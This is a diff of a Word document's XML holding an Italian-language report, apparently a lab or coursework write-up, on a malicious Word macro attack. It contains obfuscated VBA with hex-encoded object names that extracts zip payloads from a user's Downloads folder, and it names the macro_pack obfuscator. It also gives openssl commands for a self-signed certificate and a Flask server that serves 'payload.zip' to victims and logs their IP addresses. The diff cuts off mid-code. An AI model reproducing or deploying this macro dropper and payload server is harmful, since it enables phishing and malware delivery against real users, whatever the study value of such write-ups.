+        <w:t xml:space="preserve">Dim </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lnudlklaqtgmhkae</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Dim </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>scqzswhy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> As Object</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Dim </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>iiqnengur</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Dim </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nsmscbyrxd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> As Variant</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Set </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>amueyxdfeay</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>CreateObject</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>tinaalaqpomkulr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">"536372697074") &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tinaalaqpomkulr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>("696e672e46696c6553797374656d4f626a656374"))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lnudlklaqtgmhkae</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tinaalaqpomkulr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">("433a5c55") &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tinaalaqpomkulr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>("736572735c63726973745c446f776e6c6f6164735c")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>iiqnengur</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Dir(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>lnudlklaqtgmhkae</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vbNormal</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nsmscbyrxd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lnudlklaqtgmhkae</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>If Right(rmxenvuvefwomujrm, 3) = rlhlektfjszistm("7a6970") Then</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Set rpvwovdxuqrxdnypyft = CreateObject(rlhlektfjszistm("5368656c6c2e4170706c") &amp; rlhlektfjszistm("69636174696f6e"))</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>rpvwovdxuqrxdnypyft.Namespace(unialsnhj).CopyHere rpvwovdxuqrxdnypyft.Namespace(tsahrpztdxvongdmsl &amp; rmxenvuvefwomujrm).Items</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
+        <w:t xml:space="preserve">Do While </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>iiqnengur</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> &lt;&gt; ""</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">If </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Right(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>iiqnengur</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, 3) = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tinaalaqpomkulr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>("7a6970") Then</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Set </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>scqzswhy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>CreateObject</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tinaalaqpomkulr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">("5368656c6c") &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tinaalaqpomkulr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>("2e4170706c69636174696f6e"))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>scqzswhy.Namespace</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nsmscbyrxd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>).</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>CopyHere</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>scqzswhy.Namespace</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lnudlklaqtgmhkae</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>iiqnengur</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>).Items</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>DoEvents</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -2741,8 +3177,13 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t>rmxenvuvefwomujrm = Dir</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>iiqnengur</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = Dir</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2769,13 +3210,6 @@
           <w:lang w:val="it-IT"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:lang w:val="it-IT"/>
@@ -2788,12 +3222,15 @@
         </w:rPr>
         <w:t xml:space="preserve"> stato offuscato con il seguente offuscatore: </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>https://github.com/sevagas/macro_pack.git</w:t>
-      </w:r>
+      <w:hyperlink r:id="rId8" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Collegamentoipertestuale"/>
+            <w:lang w:val="it-IT"/>
+          </w:rPr>
+          <w:t>https://github.com/sevagas/macro_pack.git</w:t>
+        </w:r>
+      </w:hyperlink>
       <w:r>
         <w:rPr>
           <w:lang w:val="it-IT"/>
@@ -3072,7 +3509,7 @@
         <w:rPr>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t>. La vittima aprendo il documento Word malevolo si collega ad un server creato con il comando “</w:t>
+        <w:t xml:space="preserve">. La vittima aprendo il documento Word malevolo si collega ad un server creato con </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3086,29 +3523,218 @@
         <w:rPr>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t xml:space="preserve"> -m </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>http.server</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 8000</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">” e scarica il payload malevolo. L’attaccante avvierà poi la console ed inserirà come input l’indirizzo </w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>e scarica il payload malevolo.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Per poter usare il protocollo https ho dovuto creare un certificato </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>autofirmato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> con i seguenti comandi:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="it-IT"/>
+        </w:rPr>
+        <w:t>openssl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>genpkey</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">-algorithm RSA -out </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>private.key</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="it-IT"/>
+        </w:rPr>
+        <w:t>openssl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">req -x509 -new -key </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>private.key</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -out </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cert.pem</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -days 365</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">L’attaccante avvierà poi la console ed inserirà come input l’indirizzo </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3138,7 +3764,7 @@
         </w:rPr>
         <w:t xml:space="preserve">. Il payload è stato offuscato usando il seguente software: </w:t>
       </w:r>
-      <w:hyperlink r:id="rId8" w:history="1">
+      <w:hyperlink r:id="rId9" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Collegamentoipertestuale"/>
@@ -3190,13 +3816,591 @@
         <w:rPr>
           <w:b/>
           <w:bCs/>
-          <w:lang w:val="it-IT"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>ODICE DEL SERVER PYTHON</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">from flask import Flask, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>send_file</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>request</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">import </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>ssl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">import </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>os</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>app = Flask(__name__)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>@</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>app.route</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>('/download_file', methods=['GET'])</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>def</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>download_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>file</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t># Nome del file da scaricare</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>file_path</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = 'payload.zip'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    # Ottieni l'indirizzo IP del client che ha effettuato la richiesta</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>client_ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>request.remote</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>_addr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>f"Il</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> file è stato scaricato da: {</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>client_ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>}")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>Invia</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il file al client</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    return </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>send_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>file</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>file_path</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>as_attachment</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>=True)</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>if __name__ == '__main__':</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
